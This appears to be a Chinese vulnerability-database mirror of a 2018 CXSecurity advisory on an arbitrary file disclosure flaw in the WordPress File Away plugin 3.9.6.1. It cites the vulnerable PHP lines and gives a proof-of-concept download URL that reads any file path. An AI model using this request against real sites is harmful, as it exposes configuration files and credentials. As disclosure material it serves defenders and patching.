wordpress file-away plugin - File Disclosure - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1215618 漏洞类型
发布时间 2018-07-08 更新时间 2018-07-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070089
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Title: wordpress file-away plugin - File Disclosure
Author: Abolfazl Hajizade
Vendor: https://wordpress.org/plugins/file-away/
Version: 3.9.6.1
Date: 7.7.2018 
tested on: Windows-linux


Vulnerable page: 
/file-away/lib/cls/class.fileaway_downloader.php


Vulnerable Source: 

line 16: $file = $this->decrypt($_GET['fileaway']); 
line 35: $file = fopen($file, 'rb'); 
line 40: fread($file, 1024 * 8))

POC: 

http://site.com/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=path_file

============================================= 

WebSite : UltraSec.Org 
Channel : @UltraSecurity 
Email : zeroday1010@gmail.com 

Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar